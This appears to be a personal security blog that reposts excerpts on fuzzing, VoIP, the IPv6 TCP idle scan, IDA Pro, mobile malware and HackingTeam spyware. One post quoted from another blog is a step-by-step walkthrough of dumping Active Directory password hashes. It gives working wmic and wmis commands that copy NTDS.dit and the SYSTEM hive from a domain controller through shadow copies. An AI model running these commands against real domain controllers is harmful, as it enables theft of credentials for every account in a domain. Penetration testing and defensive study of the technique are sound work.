Fuzzing…Brute Force Vulnerability Discovery……

October 24, 2014


This week I’m writing about Fuzzing … Brute Force Vulnerability Discovery….Just got a book from the National Library (PNM).  Fuzzing is a method for discovering faults in software by providing unexpected input and monitoring for exceptions. It is typically an automated or semiautomated process that involves repeatedly manipulating and supplying data to target software for processing. Fuzzing has evolved into one of today’s most effective approaches to test software security. To “fuzz” , you attach a program’s inputs to a source random data , and then systematically identify the failures that arise. Hackers have relied on fuzzing for years.  Renowned fuzzing experts show you how to use fuzzing to reveal weaknesses in your software before someone else does.

Pregenerated Test Cases – this is the method taken by the PROTOS framework. Test case develeopment begins with studying a particular specification to understand all supported data structure and the acceptable value ranges for each. Hard coded packets or files are then generated that test boundary conditions or violate the specification altogether. Those test cases can then be used to test how accurately the specification has been implemented on target systems.Creating test cases can require considerable work up front , but has the advantage of being able to be reused to uniformly test multiple implementations of the same protocol or file format.

Manual Protocol Mutation Testing – there is no automated fuzzer involved. The researcher is the fuzzer. After loading up the target application , the researcher simply enters inappropriate data in an attempt to crash the server or induce some undesirable behaviour. This class of fuzzing is most often applied to Web applications.

Mutation or Brute Force Testing – a fuzzer that starts with a valid sample of a protocol or data format and continually mangles every individual byte , word , dword , or string within that data packet or file. This is great early approach because it requires very little up-front research and implementing a basic brute force fuzzer is relatively straightforward.

Network Protocol Fuzzing – I would like to touch this chapter- chapter 14 regarding network protocol fuzzing that requires identifying the attack surface , mutating or generating error-inducing fuzz values , transmitting those fuzz values to a target , and monitoring that target for faults. If your fuzzer communicates with its target over some form of socket , then it is a network protocol fuzzer.

The book contains chapter about Fuzzer Methods and Fuzzer Types , Data Representation and Analysis , Requirements for Effective Fuzzing , Automation and Data Generation ,Environtment Variable and Argument Fuzzing , and so on..from Chapter 8 to 26. I strongly recommend people in Software Engineering , Malware Expert field to read this book.

p/s:- Excerpt taken from the book – Fuzzing…Brute Force Vulnerability Discovery – by Addison Wesly.


CCNA Voice…

October 7, 2014


Just a few weeks ago , I borrow a book entitled CCNA Voice – Study Guide by Sybex. It’s pretty a good book to read , for those who interested in taking CCNA Voice. It Includes about 11 chapter consist of VoIP Voice. In Cisco Unified Communication architecture , Unified Communications Managers are what makes IP telephony possible. These hardware/software devices are the brains that handle IP call processing. The call processing portion of a Unified Communication System handles the sequence of operations from time a user pick up a phone to make a call to the time the user ends the call by hanging up. All of the signaling , dial interpretation , ringing , and call connecting is performed by the call processor. From a phone user’s standpoint , the call processor acts like a legacy based analog or digital phone. All of the basic phone functions such as dialing , ring signals , and interactions are the same as they’re always been. This is obviously by design ; because users are so familiar with using phones , it would be very difficult to modify user behavior.

Cisco Unified Communications Manager
When moving from Cisco Unified Communications Manager Business Edition to a full CCM solution, you are primarily gaining two key benefits: redundancy and scalability. The full Cisco Unified Communications Manager network solution can scale to virtually any size and allows you to implement multiple redundant servers that can support IP phones and applications should any of your primary call processing servers fail.

Applications Layer
As you move up to the next layer of the Cisco VoIP structure, you encounter the applications that expand the functionality of the voice network in some way. Many applications have already been developed for the Cisco VoIP solution, each of them adding its own special features to the voice network. Three of these application servers stand out as “essential applications” for many VoIP networks: Cisco Unity (voice mail), Interactive Voice Response (IVR)/Auto Attendant, and Unified Contact Center.

Cisco Unity Products
Cisco has designed the Cisco Unity product line to encompass everything dealing with messaging. Whereas traditional phone systems are geared to deliver messages to telephone handsets, Cisco Unity allows you to deliver messages to a variety of clients. This allows VoIP network users to unify (thus the name) all messaging into a single point of access. For
example, fax messages, voice mail, and e-mail can all be delivered to a single inbox. The Cisco Unity product line comes in three different flavors, as discussed in the following sections:
1.  Cisco Unity Express
2.  Cisco Unity Connection
3 . Cisco Unity

p/s:- taking from the excerpt – CCNA Voice – Study Guide – from Sybex.


TCP Idle Scans in IPV6…

February 10, 2014


After discovering how to conduct the TCP Idle Scan in IPv6, 21 dif-ferent operating
systems and versions have been analyzed regarding their properties as idle host.
Among those, all nine tested Windows systems could be used as idle host. This shows
that the mistake of IPv4 to use predictable identification fields is being repeated
in IPv6. Compared to IPv4, the idle host in IPv6 is also not expected to remain idle,
but only not to send fragmented packets. To defend against this bigger threat, the
article also introduces short-term defenses for administrators as well as long term
defenses for vendors.

When trying to attack a target, one of the first steps performed by an attacker will be to execute a port scan in order to discover which services are offered by the system and can be attacked. In the traditional approach for port scanning, SYNs1 are sent directly to various ports on the target to evaluate which services are running.

However, this method is easy to detect and to be traced back to the attacker. To remain undetected, different methods for port scanning exist, all providing various advantages and disadvantages [8]. One of those methods is the TCP Idle Scan. With this port scanning technique, the attacker uses the help of a third-party system, the so-called idle host, to cover his tracks. Most modern operating systems have been improved so that they cannot be used as idle host, but research has shown that the scan can still be executed by utilizing network printers [11]. At first sight, IPv6 seems immune to the idle scan technique, as the IPv6 header no longer contains the identification field. However, some IPv6 traffic still uses an identification field, namely if fragmentation is used. Studying the details of IPv6 reveals that an attacker can force fragmentation between other hosts. The attack on IPv6 is trickier than on IPv4 but has the benefit that more machines will be suited as idle hosts. This is because we only require the idle host not to create fragmented
IPv6 traffic, whereas in IPv4 the idle host is not allowed to create traffic at all.

2. Background
The TCP Idle Scan is a stealthy port scanning method, which allows an attacker to scan a target without the need of sending a single IP-Packet containing his own IP address to the target. Instead, he uses the IP address of a third host, the idle host, for the scan. To be able to retrieve the results from the idle host, the attacker utilizes the identification field in the IPv4 header (IPID)2, which is originally intended for fragmentation.

3. Conducting the TCP Idle Scan in IPv6
This section deals with the characteristics of the TCP Idle Scan in IPv6. Compared to IPv4, where most modern operating systems use protection mechanisms against the scan, it is novel to conduct the scan in IPv6. Therefore, not all operating systems use the same protection mechanisms as in IPv4. To give an overview of the behavior from various operating systems, tests have been conducted with 21 different systems, and the results are shown and discussed.

4.Behavior of various systems
As stated previously, for executing the TCP Idle Scan in IPv6 it is a necessity that the identification value is assigned by the idle host on a predictable and global basis. To determine which operating systems form appropriate idle hosts 21 different operating systems and versions have been tested to establish their method of assigning the identification value. Among all the tested systems, six assigned the identification value on a random basis and can therefore not be used as idle host. Out of the remaining 15, five assigned their
values on a per host basis which makes also those systems unusable. Another system which can not be used as idle host is OS X 10.6.7, which does not accept PTB messages with a MTU smaller than 1280 bytes. The nine systems which are left, and can be used
as idle hosts for the TCP Idle Scan in IPv6, are all Windows operating systems. System Assignment method usable Android 4.1 (Linux 3.0.15) Per host, incremental

(1) X FreeBSD 7.4 Random X FreeBSD 9.1 Random X
iOS 6.1.2 Random X
Linux 2.6.32 Per host, incremental (2) X
Linux 3.2 Per host, incremental (1) X
Linux 3.8 Per host, incremental X
OpenBSD 4.6 Random X
OpenBSD 5.2 Random X
OS X 10.6.7 Global, incremental (3) X
OS X 10.8.3 Random X
Solaris 11 Per host, incremental X
Windows Server 2003 R2 64bit, SP2 Global, incremental √
Windows Server 2008 32bit, SP1 Global, incremental √
Windows Server 2008 R2 64bit, SP1 Global, incremental by 2 √
Windows Server 2012 64bit Global, incremental by 2 (4) √
Windows XP Professional 32bit, SP3 Global, incremental (5) √
Windows Vista Business 64bit, SP1 Global, incremental √
Windows 7 Home Premium 32bit, SP1 Global, incremental by 2 √
Windows 7 Ultimate 32bit, SP1 Global, incremental by 2 √
Windows 8 Enterprise 32 bit Global, incremental by 2 (4) √
(1) Host calculates wrong TCP checksum for routes with PMTU < 1280
(2) No packets are sent on route with PMTU < 1280
(3) Does not accept Packet Too Big messages with MTU < 1280
(4) Per host offset
(5) IPv6 disabled by default
TABLE 1: List of tested systems

A special behavior occurred when testing Windows 8 and Windows Server 2012. A first analysis of the identification values sent to different hosts gives the impression that the values are assigned on a per-host-basis and start at a random initialization
value. A closer investigation though revealed that the values being assigned for one system are also incremented if messages are sent to another system. This leads to the conclusion that those operating systems use a global counter, but also a random offset for each host, which is added to the counter to create the identification value. However, the global counter is increased each time a message is sent to a host. For the TCP Idle Scan in IPv6, this means that the systems are still suitable as idle hosts, as from the view of the attacker, the identification value received from the idle host increases each time the idle host sends a message to the target. Being still usable as
idle host, it is a complete mystery to us what should be achieved with this behavior.

6. Conclusion
This paper has shown that by clever use of some IPv6 features, the TCP Idle Scan can successfully be transferred from IPv4 to IPv6. Therefore, this type of port scan remains a powerful tool in the hands of an attacker who wants to cover his tracks, and a challenge for anybody who tries to trace back the scan to its origin. The fact that major operating systems assign the identification value in
the fragmentation header in a predictable way also drastically increases the chances for an attacker to find a suitable idle host for executing the TCP Idle Scan in IPv6. Because the idle host is also not required to be completely idle, but only expected not to create IPv6 traffic using the fragmentation header, this chances are increased additionally. What remains is the question why it is still a common practice to utilize predictable identification values. The danger of predictable sequence numbers has already
been disclosed by Morris [13] in 1985. Although his article covered TCP, the vulnerabilities were caused by the same problem: a predictable assignment of the sequence number. For this reason, he advised to use random sequence numbers. With the TCP Idle Scan in IPv4 being first discovered in 1998, it has been shown that the necessity of unpredictable identification values also applies to IPv4. This article has shown that also in IPv6, predictable identification values facilitate attacks and should be substituted with random values. To prove that the TCP Idle Scan in IPv6 works in practice, a proof of concept has been created using the python program scapy5, which allows easycreation and manipulation of packets. The proof of concept can be found in the appendix. Furthermore, the security scanner Nmap6, which already provided a very elaborated version of the TCP Idle Scan in IPv4, has been extended in order to also handle the TCP Idle Scan in IPv6 [10]. Until vendors are able to provide patches for assigning unpredictable identification
values in the fragmentation header, administrators are advised to implement the short-term protection mechanisms described in Section 5. Additionally, one might consider an update of RFC 1981, which forces a host to append an empty fragmentation header to every IPv6 packet after receiving an ICMPv6 Packet Too Big message with an MTU smaller than the IPv6 minimum MTU. Likewise, updating RFC 2460 towards an obligatory random assignment of the identification value in the fragmentation header should be considered as well.

p/s:- This article is taken from the excerpt of Hack In The Box  Magazine , January 2014 – Vol 4 issue 10.

- Last Year PIKOM PC Fair was the best PC Fair that I’ve ever attend , on December  2013 last year….Great exhibiton from all the computer manufacturer…One from MSI is the best. Not to mention Kaspersky Booth….Bought a Pendrive 8GB…

- Well … this is my latest post for this year , 2014 ….Hope to see you soon…..


Practical Malware Analysis using IDA Pro….

September 15, 2013


Two versions of IDA Pro are commercially available. While both versions support x86, the advanced version supports many more processors than the standard version, most notably x64. IDA Pro also supports several file formats,
such as Portable Executable (PE), Common Object File Format (COFF), Executable and Linking Format (ELF), and a.out. We’ll focus our discussion on the x86 and x64 architectures and the PE file format.

The IDA Pro Interface
After you load a program into IDA Pro, you will see the disassembly window, as shown in Figure 5-2. This will be your primary space for manipulating and analyzing binaries, and it’s where the assembly code resides.

Disassembly Window Modes
You can display the disassembly window in one of two modes: graph (the default, shown in Figure 5-2) and text. To switch between modes, press the spacebar.

Graph Mode
In graph mode, IDA Pro excludes certain information that we recommend you display, such as line numbers and operation codes. To change these options, select OptionsGeneral, and then select Line prefixes and set the
Number of Opcode Bytes to 6. Because most instructions contain 6 or fewer bytes, this setting will allow you to see the memory locations and opcode values for each instruction in the code listing. (If these settings make everything
scroll off the screen to the right, try setting the Instruction Indentation to 8.)

Text Mode
The text mode of the disassembly window is a more traditional view, and you must use it to view data regions of a binary. Figure 5-3 displays the text mode view of a disassembled function. It displays the memory address (0040105B) and section name (.text) in which the opcodes (83EC18) will reside in memory .



The left portion of the text-mode display is known as the arrows window and shows the program’s nonlinear flow. Solid lines mark unconditional jumps, and dashed lines mark conditional jumps. Arrows facing up
indicate a loop. The example includes the stack layout for the function at and a comment (beginning with a semicolon) that was automatically added by IDA Pro .

Using Cross-References
A cross-reference, known as an xref in IDA Pro, can tell you where a function is called or where a string is used. If you identify a useful function and want to know the parameters with which it is called, you can use a cross-reference to
navigate quickly to the location where the parameters are placed on the stack. Interesting graphs can also be generated based on cross-references, which are helpful to performing analysis.

Code Cross-References
Listing 5-2 shows a code cross-reference at  that tells us that this function (sub_401000) is called from inside the main function at offset 0×3 into the main function. The code cross-reference for the jump at  tells us which
jump takes us to this location, which in this example corresponds to the location marked at . We know this because at offset 0×19 into sub_401000 is the jmp at memory address 0×401019.

00401000 sub_401000 proc near ; CODE XREF: _main+3p
00401000 push ebp
00401001 mov ebp, esp
00401003 loc_401003: ; CODE XREF: sub_401000+19j
00401003 mov eax, 1

00401008 test eax, eax
0040100A jz short loc_40101B
0040100C push offset aLoop ; “Loop\n”
00401011 call printf
00401016 add esp, 4
00401019 jmp short loc_401003 
Listing 5-2: Code cross-references

This chapter offered only a cursory exposure to IDA Pro. Throughout this article , we will use IDA Pro in our labs as we demonstrate interesting ways to use it.
As you’ve seen, IDA Pro’s ability to view disassembly is only one small aspect of its power. IDA Pro’s true power comes from its interactive ability, and we’ve discussed ways to use it to mark up disassembly to help perform
analysis. We’ve also discussed ways to use IDA Pro to browse the assembly code, including navigational browsing, utilizing the power of cross-references, and viewing graphs, which all speed up the analysis process.

IDA Pro is a good tools for dissasembly a program and making a reverse engineering IDA Pro is widely use for malware analysis to analyze malware. We can use IDA Pro to see the overall dissasembly process and the program code in graph view and text view. We need to have some assembly language knowledge to dissasemble a program.

p/s:- The above article is taken from excerpt ” Practical Malware Analysis – by Michael Sikorski”.


Mobile Malware Evolution….

June 18, 2013


Kaspersky Lab’s prediction that we would see the first mobile botnets for Android was also accurate. Note, however, that the botnets that emerged varied greatly in terms of where in the world devices were infected, as well as the number of infected devices, and the functions of the malware.

The predictions addressed above only affected the most commonly used platform today – Android. As far as other mobile platforms and operating systems are concerned, we expected targeted attacks to be among the key threats targeting Symbian, BlackBerry, and other mobile platforms. Typical attacks of this kind usually involve ZitMo and SpitMo (ZeuS- and SpyEye-in-the-Mobile). This prediction also proved correct. Furthermore, the family of threats designed to steal mTANs (ZitMo and SpitMo) gained a new addition – the prevalent bank Trojan Carberp now has a mobile version with the alias CitMo, or Carberp-in-the-Mobile.

Two other general, but critically important, predictions that will play a key role in determining the future of attacks on mobile platforms also came true. First, we saw the development of a fully-fledged mobile malware development industry. Second, mobile espionage went beyond the realm of law enforcement agencies and firms specializing in detective work.

The main developments in mobile malware in 2012 are the subject of this sixth edition of Kaspersky Lab’s Mobile Malware Evolution report.

Several new ZitMo modifications for Android have started to look more like their “brothers” targeting other platforms. Previously ZitMo for Android had only relatively primitive functions (primarily the ability to forward incoming text messages containing mTANs). However, the latest versions of this Trojan have included an expanded list of commands that are used by the writers of the malicious program to control and manage the threat’s operations.

An example of some of the commands in ZitMo for Android

Before 2012, attacks launched to steal mTANs had been detected in just a handful of European countries: Spain, Italy, Germany, Poland, and a few others. These attacks involved users of a variety of mobile platforms: Android, BlackBerry, Symbian, and Windows Mobile. In late 2012, Russia became one of the targets, as online banking became more commonplace — a factor that did not go unnoticed by virus writers. The widespread Trojan Carberp, which operates in a similar way to that of ZeuS, got its own mobile version: Trojan-Spy.AndroidOS.Citmo.

Just like its partner in crime ZeuS ZitMo, the CitMo Trojan is capable of concealing incoming text messages containing mTANs and forwarding them to malicious users. Different versions of CitMo forward intercepted text messages both to the telephone numbers of cybercriminals and to their remote servers.

One version of Carberp changed the landing page of a Russian bank’s online banking system. Users were asked to download and install a program allegedly required to enter the system. Users could opt to receive a link to the program by text message, either by providing their phone number in advance, or by scanning a QR code.

QR codes are one way to download malware

The link in this example led to the AberSafe application, which was actually Trojan-Spy.AndroidOS.Citmo, and was in the Google Play app store within two weeks.

p/s:- This article is taken from excerpt from Kaspersky web site http://www.securelist.com. We can see that there is a progress of malware infection from year 2012 till now 2013. Mostly , the operating system that hits the highest rank from 2012 till 2013 is Android operating system.


Volume shadow copy ntds.dit domain hashes remotely – part 1.

June 18, 2013









Ever run into a Domain Controller that wasn’t allowed to talk to the Internet, had insane AV and GPOs not allowing anyone to RDP in (Even Domain Admins) unless they provided some kind of voodo happy dance? Ya me neither, but here is how you can still dump domain hashes and hash history if you run into that case. Lets start

First authenticate to the domain controller and make sure you have a good working directory to use.

net use \\DC1 /user:DOMAIN\domainadminsvc domainadminsvc123
dir \\DC1\C$

Alright, lets say “TEMP” is there and it’s empty on the remote DC. The way we are going to run commands will not allow us to get results directly so we are going to use a temp file on the DC in C:\TEMP where we already made sure is clear.

We are going to be using Volume Shadow Copies to pull the NTDS.dit file (Active Directory’s DB much like Window’s SAM file except that it stores the entire AD set of objects there), we also need the SYSTEM registry hive. You can get the SAM registry hive as well but that will only get local DC credentials.

So lets list the current volume shadow copies to see if we need to create one, from a Windows command prompt (or if you’ve installed wmic for Linux via http://www.krenger.ch/blog/wmi-commands-from-linux/ ) – this _IS_ an interactive command so this won’t work very nicely in a Meterpreter shell:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > C:\temp\output.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
        ProcessId = 7304;
        ReturnValue = 0;

To break down this command:

  • wmic /node:DC1 - tells it to interact with the WMI API on DC1
  • /user:DOMAIN\domainadminsvc /password:domainadminsvc123 - authentication
  • process call create - WMI speak for create a process
  • cmd /c - vssadmin doesn’t operate outside of cmd for some reason…
  • vssadmin list shadows - List any shadow volumes that already exist
  • 2>&1 > C:\temp\output.txt - Take STDIN and STDERROR and throw it in a text file on DC1 C:\TEMP. Make sure you specify full path because you will be executing from within C:\Windows\System32 and its a pain to find anything in that directory. So if you just specify > bob.txt you get to hunt in C:\Windows\System32 or wherever WMI wants to execute you from for bob.txt

Process starts and then you need to view the output file by either copying it down, type \\DC1\C$\TEMP\output.txt or mount the C drive as a network share. Either way you should either see something like this:

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Contents of shadow copy set ID: {671090fd-0198}
   Contained 1 shadow copies at creation time: 5/31/2013 11:29:03 AM
      Shadow Copy ID: {0863e309}
         Original Volume: (C:)\\?\Volume{c44da10e-0154-11e1-b968-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: wpad
         Service Machine: wpad
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered


C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

No items found that satisfy the query

If there are no shadow copies or the ones there are too old (look at the creation time), you can create a shadow copy using the ‘vssadmin create shadow /for=C: command. (This command only applies to Server OS (Win2k3/Win2k8) but since those are the only two that commonly have NTDS.dit files we don’t have to remember this):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"

The other thing to keep in mind is that NTDS.dit isn’t always on the main drive. It is commonly on a “D” drive for safety if a HDD goes bad or something. But it should always be in a folder called NTDS. (By default this is C:\Windows\NTDS)

Next we just copy the files out of the shadow copies. First the SYSTEM hive:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1 > C:\temp\output.txt"

Then the NTDS.dit (notice this one isn’t in System32):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt"

In Kali Linux you could use the WMIS package to do much the same thing:

root@kali:~# wmis -U DOMAIN\domainadminsvc%domainadminsvc123 //DC1 cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt

p/s:- This article is taken from excerpt form Mubix blog http://www.room362.com
      In part 2 , you have to download ntdsxtract that is a zip file and use it to extract libesedb  and NTDS.dit. Then we can 
      can start cracking and see the user account that it use. Hope you all enjoy....


Spyware. HackingTeam…..

May 9, 2013



HackingTeam first caught our attention back in 2011, when WikiLeaks released documents describing the functions of the spyware programs the company offers to government agencies in 2008.

In early 2012, Kaspersky Lab experts detected malicious programs running on Windows that were suspiciously similar to the programs described on WikiLeaks, and with Remote Control System, the description of which was published on the company’s official website www.hackingteam.it. However, at the time, we had no way of knowing about the connections between the threats that were detected (Kaspersky Lab detects them as Korablin) and the HackingTeam spyware program.

The program’s description from HackingTeam’s website http://www.hackingteam.it/images/stories/RCS2012.pdf

That all changed in July 2012, when many antivirus companies received an email with an example of malicious code for Mac OS X with the same functions.

Our email address newvirus@kasperksy.com received this email on July 24, 2012 at 05:51:24 MSK. The subject line was empty, and there was no text — just an attachment called AdobeFlashPlayer.zip. The attachment had a self-signed JAR-file containing a program written for Mac OS X.

The header of the email was addressed to newvirus@kaspersky.com

Soon, nearly all antivirus companies had added detection of this new malware, and each company named it differently (Crizis, DaVinci, Boychi, etc. — Kaspersky Lab named it ‘Morcut’). Nearly all antivirus companies suspected that the program was developed by HackingTeam, which sells specialized tracking software to law enforcement agencies in a number of countries.


The fact that the functions are similar is just one of three circumstantial pieces of evidence linking HackingTeam to the files that were analyzed. Let’s take a look at the other two.

The data overhead in the Mac file contained the names of files and modules that the authors used when writing the program code. These names were also seen several times with “RCS”, which coincides with the abbreviation of the Remote Control System name (this abbreviation is used by HackingTeam in its promotional materials and its own description of the program on their website).

P/s:- This article is an excerpt from Securelist http://www.securelist.com form Kaspersky Lab. Hope you all enjoy reading it…!


Get every new post delivered to your Inbox.